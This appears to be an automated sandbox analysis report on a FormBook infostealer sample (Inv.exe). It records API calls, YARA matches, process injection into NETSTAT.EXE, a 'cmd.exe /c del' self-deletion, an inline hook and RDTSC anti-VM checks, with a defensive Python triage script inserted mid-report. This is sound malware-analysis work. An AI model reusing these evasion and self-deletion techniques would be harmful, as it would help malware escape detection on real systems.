          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E5A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E598F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E598A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E5B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E599D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E597A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E5A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E5A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E595F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59560 NtWriteFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E59520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E5AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0036A060 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0036A110 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00369F30 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00369FE0 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0036A08A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00369FDC NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00369FDA NtReadFile,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_0123D929
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_012451BC
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_01247991
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_012455E0
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_01240432
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_0124683C
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_012460C0
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_01245B50
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0040102F
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0041D1EF
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0041E18E
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0041DAA3
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_00402D87
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_00409E40
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_00409E3C
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0041D6FE
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0123D929
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0123A951
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_012451BC
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01247991
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0124683C
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_012460C0
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01245B50
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_012455E0
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01240432
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0194F900
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01964120
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0195B090
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A120A8
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019720A0
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A01002
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0197EBB0
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A0DBD2
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A12B28
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A122AE
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01972581
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0195D5E0
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A12D07
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01940D20
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A11D55
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0195841F
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A11FF1
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A12EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02EE22AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02ECFA2B
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02ED03DA
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02EDDBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E4EBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E3AB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02EE2B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02EE28EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E420A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02EE20A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E2B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02EEE824
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E3A830
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02ED1002
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E399BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E34120
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E1F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02EE2EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E36E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02EDD616
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02EE1FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02EEDFCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02EDD466
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E2841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E2D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02EE25DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E42581
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02EE1D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E10D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02EE2D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0036E18E
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0036D1EF
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0036DAAF
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00352D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00352D87
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00359E3C
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00359E40
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0036D6FE
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00352FB0
          Source: C:\Users\user\Desktop\Inv.exe | Code function: String function: 0123BFC3 appears 38 times
          Source: C:\Users\user\Desktop\Inv.exe | Code function: String function: 01236EF1 appears 84 times
          Source: C:\Users\user\Desktop\Inv.exe | Code function: String function: 01239160 appears 64 times
          Source: C:\Users\user\Desktop\Inv.exe | Code function: String function: 01236F06 appears 36 times
          Source: C:\Users\user\Desktop\Inv.exe | Code function: String function: 01237021 appears 40 times
          Source: C:\Users\user\Desktop\Inv.exe | Code function: String function: 0194B150 appears 35 times
          Source: C:\Users\user\Desktop\Inv.exe | Code function: String function: 0123715C appears 370 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: String function: 02E1B150 appears 66 times
          Source: Inv.exe, 00000000.00000003.670693601.000000001A516000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Inv.exe
          Source: Inv.exe, 00000001.00000002.710037557.0000000001BCF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Inv.exe
          Source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamenetstat.exej% vs Inv.exe
          Source: Inv.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/0@7/3
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: Kernel32.dll
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: User32.dll
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: User32.dll
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: IEUCIZEO
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: Kernel32.dll
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: User32.dll
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: User32.dll
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: IEUCIZEO
          Source: Inv.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Inv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Inv.exeVirustotal: Detection: 39%
          Source: Inv.exeReversingLabs: Detection: 45%
          Source: C:\Users\user\Desktop\Inv.exeFile read: C:\Users\user\Desktop\Inv.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Inv.exeProcess created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe'
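The process chain above is the behavioural core of this report: the sample re-launches a copy of itself (the hollowing target), autofmt.exe and NETSTAT.EXE appear with no monitored parent (their code arrives by injection from explorer.exe), and NETSTAT.EXE deletes the original file through cmd.exe. The following is an added example, not part of the Joe Sandbox report and not FormBook tooling: a small Python triage script that parses process-creation lines of the shape used above and flags that chain. The log lines embedded in it are constructed to mirror the entries above; reading a parent listed as "unknown" as "not a monitored process" is an assumption of the example, as is treating conhost.exe as a benign helper that any console process may spawn.

```python
"""Triage of sandbox 'Process created' lines (added example, constructed input)."""
import re
from collections import defaultdict

# Accepts both 'Source: X | Process created: ...' and the fused 'Source: XProcess created: ...'
LINE = re.compile(
    r"^Source:\s*(?P<parent>.*?)\s*\|?\s*Process created:\s*(?P<image>\S+)\s*(?P<cmdline>.*)$")

WINDOWS_DIRS = ("c:\\windows\\syswow64\\", "c:\\windows\\system32\\")
BENIGN_HELPERS = {"conhost.exe"}   # assumption: console host is spawned for any console process


def parse(log):
    """Return (parent, image, cmdline) for every line that looks like a process creation."""
    events = []
    for raw in log.splitlines():
        m = LINE.match(raw.strip())
        if m:
            events.append((m["parent"], m["image"], m["cmdline"]))
    return events


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def triage(log, sample_path):
    """Flag the three links of the chain: self-relaunch, unattributed system tools,
    and self-deletion of the sample through cmd.exe."""
    events = parse(log)
    parents = defaultdict(set)                     # image -> set of observed parents
    for parent, image, _ in events:
        parents[image].add(parent)

    verdict = {"self_relaunch": [], "unattributed_system_tools": [], "self_delete_via": []}
    for parent, image, cmdline in events:
        # A process creating another instance of its own image: hollowing candidate.
        if parent.lower() == image.lower():
            verdict["self_relaunch"].append(image)
        # cmd.exe /c del <sample> with an attributed parent: who removed the dropper?
        if (basename(image) == "cmd.exe" and re.search(r"\bdel\b", cmdline, re.I)
                and sample_path.lower() in cmdline.lower() and parent != "unknown"):
            verdict["self_delete_via"].append(basename(parent))
    # Windows system binaries that were only ever seen without a monitored parent.
    for image, ps in parents.items():
        if (image.lower().startswith(WINDOWS_DIRS) and ps == {"unknown"}
                and basename(image) not in BENIGN_HELPERS):
            verdict["unattributed_system_tools"].append(basename(image))

    verdict["suspicious"] = bool(verdict["self_relaunch"] and verdict["self_delete_via"])
    return verdict


# Constructed log mirroring the report's process-creation entries (not the report itself).
SAMPLE_LOG = r"""
Source: unknown | Process created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: unknown | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Inv.exe | Process created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe'
"""

if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG, r"C:\Users\user\Desktop\Inv.exe").items():
        print(f"{key}: {value}")
```

The three flags are deliberately separate: a self-relaunch alone is common in installers, and an unattributed system tool alone can be a monitoring gap, but a self-relaunch followed by a system tool deleting the dropper is the combination worth escalating.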
          Source: Inv.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Inv.exe, 00000000.00000003.670292202.000000001A590000.00000004.00000001.sdmp, Inv.exe, 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Inv.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
          Source: Inv.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: Inv.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: Inv.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: Inv.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: Inv.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_012391A5 push ecx; ret
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0041D0D2 push eax; ret
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0041D0DB push eax; ret
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0041D085 push eax; ret
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0041D13C push eax; ret
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0041D1EF push ebp; ret
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0040F345 push edi; retf
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0041E7C6 push edx; ret
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_012391A5 push ecx; ret
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0199D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_02E6D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0036D085 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0036D0D2 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0036D0DB push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0036D13C push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0036D1EF push ebp; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0036DA9F push cs; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0035F345 push edi; retf
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0036E7C6 push edx; ret

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE3
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Inv.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Inv.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
